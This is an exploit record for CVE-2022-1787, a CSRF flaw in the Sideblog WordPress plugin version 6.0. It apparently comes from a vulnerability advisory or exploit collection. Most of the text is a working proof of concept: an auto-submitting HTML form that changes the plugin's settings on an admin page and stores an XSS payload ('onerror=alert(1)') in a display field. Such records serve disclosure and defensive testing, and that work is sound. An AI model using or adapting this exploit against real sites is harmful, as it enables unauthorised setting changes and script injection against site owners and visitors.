CVE: CVE-2022-1787

Name: Sideblog WordPress Plugin (sideblog)

Version: 6.0

Date: 2022-04-19 20:52:59

Advisory: https://wpscan.com/vulnerability/b85920b3-dfc1-4112-abd8-ce6a5d91ae0d

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=sideblog.php" method="POST">
    <input type="text" name="sideblog_options_update" value="update">
    <input type="text" name="sideblog_options[setaside][1]" value="1">
    <input type="text" name="sideblog_options[displayformat][1]" value="<img src=x onerror=alert(1)>">
    <input type="text" name="sideblog_options[numentries][1]" value="1">
    <input type="text" name="sideblog_options[order][1]" value="DESC">
    <input type="text" name="op" value="update">
</form>
<script>
    document.forms[0].submit();
</script>